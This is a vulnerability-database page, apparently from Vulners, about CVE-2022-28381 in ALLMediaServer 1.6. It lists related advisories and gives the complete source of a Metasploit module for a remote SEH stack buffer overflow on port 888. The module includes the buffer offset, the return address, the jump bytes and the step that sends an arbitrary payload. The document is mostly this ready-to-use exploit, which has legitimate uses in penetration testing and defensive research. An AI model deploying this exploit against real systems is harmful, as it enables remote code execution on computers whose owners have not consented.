| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| ALLMediaServer 1.6 Buffer Overflow Exploit | 6 Apr 202200:00 | – | zdt | |
| CVE-2022-28381 | 3 Apr 202219:15 | – | attackerkb | |
| CVE-2022-28381 | 3 Apr 202222:26 | – | circl | |
| Microsoft ALLMediaServer 缓冲区错误漏洞 | 3 Apr 202200:00 | – | cnnvd | |
| CVE-2022-28381 | 3 Apr 202218:30 | – | cve | |
| CVE-2022-28381 | 3 Apr 202218:30 | – | cvelist | |
| ALLMediaServer 1.6 SEH Buffer Overflow | 5 Apr 202217:42 | – | metasploit | |
| CVE-2022-28381 | 3 Apr 202219:15 | – | nvd | |
| Stack overflow | 3 Apr 202219:15 | – | prion | |
| Metasploit Wrap-Up | 8 Apr 202217:50 | – | rapid7blog |
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Author: Hejap Zairy
# Date: 1.08.2022
# Exploit Prof
# Proof and Exploit:
#image:https://i.imgur.com/yLrRR2t.png
#video:https://streamable.com/x4i50c
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'ALLMediaServer 1.6 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in ALLMediaServer 1.6
The vulnerability is caused due to a boundary error within the
handling of HTTP request.
Thank you Saud Alenazi and 0xSaudi
and Muhammad Al Ahmadi and all the friends in Tuwaiq i Love Tuwaiq
},
'License' => MSF_LICENSE,
'Author' =>
[
'Hejap Zairy Al-Sharif', # Remote exploit and Metasploit module
],
'DefaultOptions' =>
{
'ExitFunction' => 'process', #none/process/thread/seh
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => '\x00\x0a\x0d\xff'
},
'Targets' =>
[
[ 'ALLMediaServer 1.6 / Windows 10 - English',
{
'Ret' => 0x0040590B, # POP ESI # POP EBX # RET
'Offset' => 1072
}
],
[ 'ALLMediaServer 1.6 / Windows XP SP3 - English',
{
'Ret' => 0x0040590B, # POP ESI # POP EBX # RET
'Offset' => 1072
}
],
[ 'ALLMediaServer 1.6 / Windows 7 SP1 - English',
{
'Ret' => 0x0040590B, # POP ESI # POP EBX # RET
'Offset' => 1072
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Apr 1 2022',
'DefaultTarget' => 1))
register_options([Opt::RPORT(888)], self.class)
end
def exploit
connect
buffer = ""
buffer << make_nops(target['Offset'])
buffer << "\xeb\x06\x90\x90"
buffer << "\x0B\x59\x40\x00"
buffer << make_nops(100)
buffer << payload.encoded
buffer << make_nops(50)
print_status("Sending payload ... \n Exploit MediaServer")
sock.put(buffer)
handler
disconnect
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation